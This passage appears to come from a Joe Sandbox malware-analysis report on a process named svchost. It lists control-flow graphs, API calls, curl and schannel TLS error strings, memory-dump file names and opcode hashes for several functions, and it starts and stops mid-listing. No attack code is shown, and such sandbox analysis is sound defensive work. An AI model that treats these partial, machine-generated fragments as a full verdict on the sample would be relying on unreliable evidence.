1574->1581 1575->1564 1579 7ffda378d327-7ffda378d32e 1576->1579 1580 7ffda378d2ee-7ffda378d2f2 1576->1580 1584 7ffda378d3f9-7ffda378d400 1578->1584 1582 7ffda378d33d-7ffda378d346 1579->1582 1583 7ffda378d330 1579->1583 1580->1579 1585 7ffda378d2f4-7ffda378d316 call 7ffda3738f40 1580->1585 1586 7ffda378d5cd-7ffda378d5d4 1581->1586 1587 7ffda378d621-7ffda378d62d call 7ffda37430a0 1581->1587 1582->1576 1588 7ffda378d348-7ffda378d34c 1582->1588 1583->1582 1584->1568 1589 7ffda378d406-7ffda378d409 1584->1589 1585->1563 1607 7ffda378d31c-7ffda378d321 1585->1607 1592 7ffda378d5d6-7ffda378d5dd 1586->1592 1593 7ffda378d60b-7ffda378d617 call 7ffda37430a0 1586->1593 1587->1575 1588->1578 1594 7ffda378d352-7ffda378d357 1588->1594 1595 7ffda378d40b 1589->1595 1596 7ffda378d414-7ffda378d41e call 7ffda37901e0 1589->1596 1600 7ffda378d5f5-7ffda378d601 call 7ffda37430a0 1592->1600 1601 7ffda378d5df-7ffda378d5eb call 7ffda37430a0 1592->1601 1593->1587 1594->1578 1604 7ffda378d35d-7ffda378d367 1594->1604 1595->1596 1613 7ffda378d429 1596->1613 1614 7ffda378d420-7ffda378d427 1596->1614 1600->1593 1601->1600 1604->1584 1610 7ffda378d36d-7ffda378d38a memmove 1604->1610 1607->1563 1607->1579 1610->1544 1612 7ffda378d390 1610->1612 1612->1589 1615 7ffda378d430-7ffda378d433 1613->1615 1614->1615 1616 7ffda378d439-7ffda378d469 1615->1616 1617 7ffda378d560-7ffda378d568 1615->1617 1623 7ffda378d50a-7ffda378d52b call 7ffda3779b00 call 7ffda37430a0 1616->1623 1624 7ffda378d46f-7ffda378d477 1616->1624 1618 7ffda378d56a-7ffda378d56e 1617->1618 1619 7ffda378d584-7ffda378d588 1617->1619 1618->1558 1621 7ffda378d574-7ffda378d57f call 7ffda378da20 1618->1621 1619->1558 1622 7ffda378d58e-7ffda378d599 call 7ffda378de50 1619->1622 1621->1619 1622->1570 1639 7ffda378d530 1623->1639 1624->1623 1627 7ffda378d47d-7ffda378d480 1624->1627 1631 7ffda378d535-7ffda378d538 1627->1631 1632 7ffda378d486-7ffda378d48d 1627->1632 1636 7ffda378d53a CertFreeCertificateContext 1631->1636 1637 7ffda378d540-7ffda378d546 1631->1637 1632->1631 1634 7ffda378d493-7ffda378d4ba memset call 7ffda3793740 1632->1634 1634->1639 1643 7ffda378d4bc-7ffda378d4c6 1634->1643 1636->1637 1637->1617 1640 7ffda378d548-7ffda378d557 call 7ffda37430a0 1637->1640 1639->1631 1640->1617 1645 7ffda378d4c8-7ffda378d4d2 1643->1645 1646 7ffda378d4f9-7ffda378d508 call 7ffda37430a0 1643->1646 1645->1646 1648 7ffda378d4d4-7ffda378d4e6 call 7ffda378fa60 1645->1648 1646->1639 1648->1639 1652 7ffda378d4e8-7ffda378d4f7 call 7ffda37430a0 1648->1652 1652->1639
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451913259.00007FFDA3731000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDA3730000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451887673.00007FFDA3730000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451974814.00007FFDA3797000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3452007956.00007FFDA37B2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3452031761.00007FFDA37B3000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3452057925.00007FFDA37B4000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3452090007.00007FFDA37B6000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda3730000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: Certmalloc$CertificateContextFreefreememmove$ErrorLastNameString_errnomemsetrealloc
                                                                                            • String ID: SSL: failed retrieving public key from server certificate$SSL: public key does not match pinned public key$schannel: %s$schannel: Failed to read remote certificate context: %s$schannel: SNI or certificate check failed: %s$schannel: failed to receive handshake, SSL/TLS connection failed$schannel: failed to send next handshake data: sent %zd of %lu bytes$schannel: next InitializeSecurityContext failed: %s$schannel: unable to allocate memory$schannel: unable to re-allocate memory
                                                                                            • API String ID: 726578228-413892695
                                                                                            • Opcode ID: 1370aeb09722761c115d09812e566dbe39503a4e3c33be558194c66d30682ad3
                                                                                            • Instruction ID: 71af71d38315d805af60da646f231119a71ad9ba7979fdad1dd666c804642729
                                                                                            • Opcode Fuzzy Hash: 1370aeb09722761c115d09812e566dbe39503a4e3c33be558194c66d30682ad3
                                                                                            • Instruction Fuzzy Hash: 0A027E72B0A78686EB60CF16E4643A977E2FB44784F404036DA4E67B96DF7EE580C704
                                                                                            Function 00007FFDA36E8140 Relevance: 33.5, APIs: 8, Strings: 11, Instructions: 211networkCOMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 1655 7ffda36e8140-7ffda36e8151 1656 7ffda36e816c-7ffda36e9b27 WSASetLastError ERR_clear_error call 7ffda36ec64a 1655->1656 1657 7ffda36e8153 call 7ffda36e8d70 1655->1657 1664 7ffda36e9b2d-7ffda36e9b53 WSAGetLastError SSL_get_error ERR_get_error 1656->1664 1665 7ffda36e9d4e-7ffda36e9d64 call 7ffda36ec620 1656->1665 1661 7ffda36e8158-7ffda36e815a 1657->1661 1661->1656 1663 7ffda36e815c-7ffda36e816b call 7ffda36e8180 1661->1663 1667 7ffda36e9b59-7ffda36e9b5c 1664->1667 1668 7ffda36e9c6d-7ffda36e9c93 call 7ffda36e8c80 call 7ffda36e2d70 1664->1668 1677 7ffda36e9dac-7ffda36e9db6 call 7ffda36e7c30 1665->1677 1678 7ffda36e9d66-7ffda36e9d91 ERR_get_error call 7ffda36e8c80 call 7ffda36e2d70 1665->1678 1671 7ffda36e9c63-7ffda36e9c68 1667->1671 1672 7ffda36e9b62-7ffda36e9b65 1667->1672 1698 7ffda36e9c95-7ffda36e9c98 free 1668->1698 1699 7ffda36e9c9e-7ffda36e9cb7 1668->1699 1679 7ffda36e9dc1-7ffda36e9de8 call 7ffda36f6230 1671->1679 1675 7ffda36e9b6b-7ffda36e9b6e 1672->1675 1676 7ffda36e9c59-7ffda36e9c5e 1672->1676 1682 7ffda36e9b91-7ffda36e9b9f call 7ffda36ec692 1675->1682 1683 7ffda36e9b70-7ffda36e9b8c call 7ffda36e2d70 call 7ffda36e8180 1675->1683 1676->1679 1693 7ffda36e9dbc 1677->1693 1694 7ffda36e9c4a-7ffda36e9c54 call 7ffda36e8180 1677->1694 1678->1694 1714 7ffda36e9d97-7ffda36e9daa free call 7ffda36e8180 1678->1714 1705 7ffda36e9ba1-7ffda36e9ba4 1682->1705 1706 7ffda36e9bff-7ffda36e9c02 1682->1706 1683->1679 1693->1679 1694->1679 1698->1699 1700 7ffda36e9cb9 1699->1700 1701 7ffda36e9ce3-7ffda36e9ce9 1699->1701 1707 7ffda36e9cbb-7ffda36e9cbe 1700->1707 1708 7ffda36e9d09-7ffda36e9d4c call 7ffda36e2d70 call 7ffda36e8180 1700->1708 1701->1708 1710 7ffda36e9ceb-7ffda36e9cee 1701->1710 1705->1706 1715 7ffda36e9ba6-7ffda36e9bb6 1705->1715 1712 7ffda36e9c3b-7ffda36e9c45 call 7ffda36e2d70 1706->1712 1713 7ffda36e9c04-7ffda36e9c06 1706->1713 1707->1708 1717 7ffda36e9cc0-7ffda36e9cc3 1707->1717 1708->1679 1710->1708 1719 7ffda36e9cf0-7ffda36e9cf3 1710->1719 1712->1694 1713->1712 1720 7ffda36e9c08-7ffda36e9c36 call 7ffda36ec450 call 7ffda36e2d70 call 7ffda36e8180 1713->1720 1714->1679 1716 7ffda36e9bc0-7ffda36e9bcc 1715->1716 1716->1706 1724 7ffda36e9bce-7ffda36e9bd2 1716->1724 1717->1708 1725 7ffda36e9cc5-7ffda36e9cc8 1717->1725 1719->1708 1726 7ffda36e9cf5-7ffda36e9cfb 1719->1726 1720->1679 1724->1716 1730 7ffda36e9bd4-7ffda36e9bfa call 7ffda36ec776 call 7ffda36e2d70 call 7ffda36e8180 1724->1730 1725->1708 1731 7ffda36e9cca-7ffda36e9ccd 1725->1731 1726->1708 1732 7ffda36e9cfd-7ffda36e9d03 1726->1732 1730->1679 1731->1708 1736 7ffda36e9ccf-7ffda36e9cd2 1731->1736 1732->1694 1732->1708 1736->1708 1739 7ffda36e9cd4-7ffda36e9cde call 7ffda36e8180 1736->1739 1739->1679
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: ErrorLastR_get_error$E_finishE_freeL_get_errorR_clear_errorS_methodX509_freeX_newfree
                                                                                            • String ID: SSL SYSCALL error: %s$SSL SYSCALL error: EOF detected$SSL error: %s$SSL error: certificate verify failed: %s$TLSv1$TLSv1.3$This may indicate that the server does not support any SSL protocol version between %s and %s.$certificate could not be obtained: %s$out of memory allocating error description$system$unrecognized SSL error code: %d
                                                                                            • API String ID: 2649262036-2362506927
                                                                                            • Opcode ID: 0f4d164b573ed57c619845cad48045907740d817cd1e58aedd085b45466e4b7a
                                                                                            • Instruction ID: d5167ad201cfd283af58a6f58ad6a083eefedb3dc1afba51154c8751778a82e2
                                                                                            • Opcode Fuzzy Hash: 0f4d164b573ed57c619845cad48045907740d817cd1e58aedd085b45466e4b7a
                                                                                            • Instruction Fuzzy Hash: 3181D025F1FA5740FA18AB7594352B912C3AF46B80F2C3435D90E6B3D7EE2EE4498348
                                                                                            Function 00007FFDA3779B00 Relevance: 29.9, APIs: 6, Strings: 11, Instructions: 118COMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 1749 7ffda3779b00-7ffda3779b3e GetLastError _errno 1750 7ffda3779b40-7ffda3779b42 1749->1750 1751 7ffda3779b47-7ffda3779b58 1749->1751 1754 7ffda377a06e-7ffda377a08c call 7ffda3795780 1750->1754 1752 7ffda3779b5e 1751->1752 1753 7ffda3779efc-7ffda3779f02 1751->1753 1755 7ffda3779b64-7ffda3779b6d 1752->1755 1756 7ffda3779ef0-7ffda3779ef7 1752->1756 1758 7ffda3779f04 1753->1758 1759 7ffda3779f76-7ffda3779f7f 1753->1759 1760 7ffda3779b73-7ffda3779b83 1755->1760 1761 7ffda3779ffe-7ffda377a00b 1755->1761 1764 7ffda3779b8f-7ffda3779b9c call 7ffda377abe0 1756->1764 1765 7ffda3779f6a-7ffda3779f71 1758->1765 1766 7ffda3779f06-7ffda3779f0c 1758->1766 1759->1761 1763 7ffda3779f81-7ffda3779f99 1759->1763 1760->1764 1761->1764 1768 7ffda377a011-7ffda377a029 call 7ffda3761920 1761->1768 1763->1761 1773 7ffda3779ba1-7ffda3779bad 1764->1773 1765->1764 1769 7ffda3779f5e-7ffda3779f65 1766->1769 1770 7ffda3779f0e-7ffda3779f14 1766->1770 1781 7ffda377a03b-7ffda377a04c _errno 1768->1781 1769->1764 1771 7ffda3779f52-7ffda3779f59 1770->1771 1772 7ffda3779f16-7ffda3779f1c 1770->1772 1771->1764 1775 7ffda3779f1e-7ffda3779f24 1772->1775 1776 7ffda3779f46-7ffda3779f4d 1772->1776 1777 7ffda3779bb3-7ffda3779bcd call 7ffda3761920 1773->1777 1778 7ffda377a02b-7ffda377a036 call 7ffda3761920 1773->1778 1782 7ffda3779f3a-7ffda3779f41 1775->1782 1783 7ffda3779f26-7ffda3779f28 1775->1783 1776->1764 1777->1781 1778->1781 1785 7ffda377a04e-7ffda377a054 _errno 1781->1785 1786 7ffda377a057-7ffda377a060 GetLastError 1781->1786 1782->1764 1783->1761 1787 7ffda3779f2e-7ffda3779f35 1783->1787 1785->1786 1789 7ffda377a062-7ffda377a065 SetLastError 1786->1789 1790 7ffda377a06b 1786->1790 1787->1764 1789->1790 1790->1754
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451913259.00007FFDA3731000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDA3730000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451887673.00007FFDA3730000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451974814.00007FFDA3797000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3452007956.00007FFDA37B2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3452031761.00007FFDA37B3000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3452057925.00007FFDA37B4000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3452090007.00007FFDA37B6000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda3730000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: ErrorLast_errno
                                                                                            • String ID: %s (0x%08X)$%s (0x%08X) - %s$CRYPT_E_NOT_IN_REVOCATION_DATABASE$CRYPT_E_NO_REVOCATION_CHECK$CRYPT_E_NO_REVOCATION_DLL$CRYPT_E_REVOCATION_OFFLINE$CRYPT_E_REVOKED$No error$SEC_E_ILLEGAL_MESSAGE (0x%08X) - This error usually occurs when a fatal SSL/TLS alert is received (e.g. handshake failed). More detail may be available in the Windows System event log.$SEC_I_CONTINUE_NEEDED$Unknown error
                                                                                            • API String ID: 3939687465-2168394622
                                                                                            • Opcode ID: feee24e5bed6a7ee7a67841cdcdd34cb7299311857997a203c2e954a48a94822
                                                                                            • Instruction ID: 19d5e0c900b9da0d0069bd8debc671c80b82451fb73c9e6f75bbd334b103bc15
                                                                                            • Opcode Fuzzy Hash: feee24e5bed6a7ee7a67841cdcdd34cb7299311857997a203c2e954a48a94822
                                                                                            • Instruction Fuzzy Hash: 4851C121F0F682D9FA658B0494B42B97263BF89784F980435D90E223A3EF7EF545D609
                                                                                            Function 00007FFDA378CB80 Relevance: 28.3, APIs: 5, Strings: 11, Instructions: 278libraryloaderCOMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 1906 7ffda378cb80-7ffda378cbfd call 7ffda37901c0 call 7ffda37901a0 call 7ffda3787db0 1913 7ffda378cc0e-7ffda378cc12 1906->1913 1914 7ffda378cbff-7ffda378cc09 call 7ffda3743190 1906->1914 1916 7ffda378cc5e 1913->1916 1917 7ffda378cc14-7ffda378cc34 GetModuleHandleW GetProcAddress 1913->1917 1914->1913 1919 7ffda378cc60-7ffda378cc67 1916->1919 1917->1916 1918 7ffda378cc36-7ffda378cc58 call 7ffda3787db0 1917->1918 1918->1916 1928 7ffda378cc5a-7ffda378cc5c 1918->1928 1921 7ffda378cc69-7ffda378cc6d 1919->1921 1922 7ffda378cc73-7ffda378cc95 call 7ffda3787db0 1919->1922 1921->1922 1925 7ffda378cc6f-7ffda378cc71 1921->1925 1929 7ffda378cc9b 1922->1929 1930 7ffda378cfc3-7ffda378cfd2 call 7ffda37430a0 1922->1930 1926 7ffda378cc9d-7ffda378cca8 1925->1926 1931 7ffda378ccaa-7ffda378ccc6 call 7ffda3791160 call 7ffda3790a30 1926->1931 1932 7ffda378ccdf-7ffda378cce5 call 7ffda378b960 1926->1932 1928->1919 1929->1926 1940 7ffda378cfd7-7ffda378d000 call 7ffda3795780 1930->1940 1947 7ffda378ccc8-7ffda378cccf 1931->1947 1948 7ffda378ccd2-7ffda378ccdd call 7ffda3791190 1931->1948 1936 7ffda378ccea-7ffda378ccf0 1932->1936 1939 7ffda378ccf6-7ffda378ccfd 1936->1939 1936->1940 1942 7ffda378ccff 1939->1942 1943 7ffda378cd03-7ffda378cd16 call 7ffda3740c70 1939->1943 1942->1943 1952 7ffda378ce65-7ffda378ce6a 1943->1952 1953 7ffda378cd1c-7ffda378cd20 1943->1953 1947->1948 1948->1932 1948->1953 1952->1940 1955 7ffda378cd31-7ffda378cd35 1953->1955 1956 7ffda378cd22-7ffda378cd2c call 7ffda3743190 1953->1956 1958 7ffda378cde7-7ffda378cdfe 1955->1958 1959 7ffda378cd3b-7ffda378cd55 call 7ffda378f520 1955->1959 1956->1955 1960 7ffda378ce05-7ffda378ce31 1958->1960 1967 7ffda378cd57-7ffda378cd6b call 7ffda37430a0 1959->1967 1968 7ffda378cd70-7ffda378cde5 memmove call 7ffda3788030 call 7ffda378f5e0 call 7ffda3743190 1959->1968 1962 7ffda378ce3a-7ffda378ce54 calloc 1960->1962 1963 7ffda378ce33 1960->1963 1965 7ffda378ce56-7ffda378ce60 call 7ffda37430a0 1962->1965 1966 7ffda378ce6f-7ffda378ced0 1962->1966 1963->1962 1965->1952 1975 7ffda378cf49-7ffda378cf86 call 7ffda3738f40 1966->1975 1976 7ffda378ced2-7ffda378cefd free call 7ffda3779b00 1966->1976 1967->1940 1968->1960 1991 7ffda378cf88-7ffda378cf8b 1975->1991 1992 7ffda378cfaa-7ffda378cfc1 call 7ffda37430a0 1975->1992 1984 7ffda378ceff-7ffda378cf05 1976->1984 1985 7ffda378cf33-7ffda378cf44 call 7ffda37430a0 1976->1985 1988 7ffda378cf07-7ffda378cf18 call 7ffda37430a0 1984->1988 1989 7ffda378cf1d-7ffda378cf2e call 7ffda37430a0 1984->1989 1985->1940 1988->1940 1989->1940 1991->1992 1996 7ffda378cf8d-7ffda378cfa8 1991->1996 1992->1940 1996->1940
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451913259.00007FFDA3731000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDA3730000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451887673.00007FFDA3730000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451974814.00007FFDA3797000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3452007956.00007FFDA37B2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3452031761.00007FFDA37B3000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3452057925.00007FFDA37B4000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3452090007.00007FFDA37B6000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda3730000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: ConditionMask$AddressHandleInfoModuleProcVerifyVersionmemmove$ErrorLast_errnocallocfreememset
                                                                                            • String ID: ALPN: curl offers %s$Error setting ALPN$ntdll$schannel: SNI or certificate check failed: %s$schannel: Windows version is old and may not be able to connect to some servers due to lack of SNI, algorithms, etc.$schannel: failed to send initial handshake data: sent %zd of %lu bytes$schannel: initial InitializeSecurityContext failed: %s$schannel: this version of Windows is too old to support certificate verification via CA bundle file.$schannel: unable to allocate memory$schannel: using IP address, SNI is not supported by OS.$wine_get_version
                                                                                            • API String ID: 3185706071-3097429119
                                                                                            • Opcode ID: a88905b97132a0f103da4ae54ce882051c2e5ca5273eef927e76702f8f95584c
                                                                                            • Instruction ID: 9fff33886e849e3aa1b31576a001c679b72e2898deed0575372ca5451bd2b1da
                                                                                            • Opcode Fuzzy Hash: a88905b97132a0f103da4ae54ce882051c2e5ca5273eef927e76702f8f95584c
                                                                                            • Instruction Fuzzy Hash: 8EC1A136B0A74286FB10DB21E4642AE77A6FB44788F004036DE4D27B5ADF3EE595C708
                                                                                            Function 00007FFDA373BCC0 Relevance: 18.0, APIs: 1, Strings: 9, Instructions: 490COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451913259.00007FFDA3731000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDA3730000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451887673.00007FFDA3730000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451974814.00007FFDA3797000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3452007956.00007FFDA37B2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3452031761.00007FFDA37B3000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3452057925.00007FFDA37B4000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3452090007.00007FFDA37B6000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda3730000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: CounterPerformanceQuery
                                                                                            • String ID: %s assess started=%d, result=%d$%s connect -> %d, connected=%d$%s connect timeout after %lldms, move on!$%s done$%s starting (timeout=%lldms)$%s trying next$Connection timeout after %lld ms$Failed to connect to %s port %u after %lld ms: %s$all eyeballers failed
                                                                                            • API String ID: 2783962273-3359130258
                                                                                            • Opcode ID: cc7d656516ac663056c557af6d5954c1dd54e1b3f91d78df4648890ba3a266a5
                                                                                            • Instruction ID: fabd406a7d5ec20dc5fbad8ce2c1de0de53d73a3a5d240ad0ec849bdae0cf3d6
                                                                                            • Opcode Fuzzy Hash: cc7d656516ac663056c557af6d5954c1dd54e1b3f91d78df4648890ba3a266a5
                                                                                            • Instruction Fuzzy Hash: 7032D022B0A6868AFB198F74C5602BC33A2FB04B98F144235DE5D77796DF39E551C344
                                                                                            Function 00007FFDA3784CC0 Relevance: 17.7, APIs: 5, Strings: 5, Instructions: 176stringCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451913259.00007FFDA3731000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDA3730000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451887673.00007FFDA3730000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451974814.00007FFDA3797000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3452007956.00007FFDA37B2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3452031761.00007FFDA37B3000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3452057925.00007FFDA37B4000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3452090007.00007FFDA37B6000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda3730000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: _strdup$callocfreestrncmp
                                                                                            • String ID: Could not resolve host: %s$Couldn't resolve proxy '%s'$Failed to resolve host '%s' with timeout after %lld ms$Unix socket path too long: '%s'$localhost/
                                                                                            • API String ID: 349811053-652210993
                                                                                            • Opcode ID: 1b9ca34e3b3f2d4686301eafdf596b673b5f06633424a2ef55324309f437c312
                                                                                            • Instruction ID: fad57c858def9bce7755384dd1d6bb6fbf6bc6000cd551047baecf3a6b767faa
                                                                                            • Opcode Fuzzy Hash: 1b9ca34e3b3f2d4686301eafdf596b673b5f06633424a2ef55324309f437c312
                                                                                            • Instruction Fuzzy Hash: 41712821B0AB9687FBA88B24D0613B973A2FB44784F444035DF8D67786DF2EE894C714
                                                                                            Function 00007FFD94737760 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 140librarymemoryCOMMONLIBRARYCODE
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • LoadLibraryExW.KERNEL32(?,?,00000000,00007FFD94737E16,?,?,?,00007FFD94737D99), ref: 00007FFD947377CD
                                                                                            • GetLastError.KERNEL32(?,?,00000000,00007FFD94737E16,?,?,?,00007FFD94737D99), ref: 00007FFD947377DF
                                                                                            • LoadLibraryExW.KERNEL32(?,?,00000000,00007FFD94737E16,?,?,?,00007FFD94737D99), ref: 00007FFD94737821
                                                                                            • VirtualProtect.KERNEL32 ref: 00007FFD9473787D
                                                                                            • VirtualProtect.KERNEL32 ref: 00007FFD947378AE
                                                                                            • FreeLibrary.KERNEL32(?,?,00000000,00007FFD94737E16,?,?,?,00007FFD94737D99), ref: 00007FFD947378F2
                                                                                            • GetProcAddressForCaller.KERNELBASE(?,?,00000000,00007FFD94737E16,?,?,?,00007FFD94737D99), ref: 00007FFD947378FE
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451099495.00007FFD94691000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFD94690000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451064532.00007FFD94690000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451208341.00007FFD94753000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451387269.00007FFD948AA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451421580.00007FFD948AD000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451454324.00007FFD948AE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451495194.00007FFD948B2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffd94690000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: Library$LoadProtectVirtual$AddressCallerErrorFreeLastProc
                                                                                            • String ID: AppPolicyGetProcessTerminationMethod$api-ms-$ext-ms-
                                                                                            • API String ID: 983678269-1880043860
                                                                                            • Opcode ID: 19b8e87cf9301367cd08217d46230329f98ca96a54b7e9c7c7eddbc50712cf40
                                                                                            • Instruction ID: 525d37096328817e01be6df9acd1d799f2121f47815d267bd0fdf350f0b1a2da
                                                                                            • Opcode Fuzzy Hash: 19b8e87cf9301367cd08217d46230329f98ca96a54b7e9c7c7eddbc50712cf40
                                                                                            • Instruction Fuzzy Hash: 15518E21B0960ED5EA349BA6A8B05B57250AF4ABB0F58C734DE3D477D2EE2CE405C280
                                                                                            Function 00007FFDA36F3450 Relevance: 16.6, APIs: 11, Instructions: 147COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: _errno$Last$Status$CloseHandle$AttributesErrorFile
                                                                                            • String ID:
                                                                                            • API String ID: 2758595869-0
                                                                                            • Opcode ID: d3df3df46ebeed910f37aa43a7ceb0c59825b7abfe0e09809676aeb9f0070ec4
                                                                                            • Instruction ID: 81b0519d0032ac60fdc88b4c3e8217c9b6ef4da793ff19728cab90a3a37eb696
                                                                                            • Opcode Fuzzy Hash: d3df3df46ebeed910f37aa43a7ceb0c59825b7abfe0e09809676aeb9f0070ec4
                                                                                            • Instruction Fuzzy Hash: 35512862B0FA4241F6254B25A82037A7292BF84734F6C6330EA6D677D3DF3EE4408718
                                                                                            Function 00007FFDA36DA090 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 82networkCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Strings
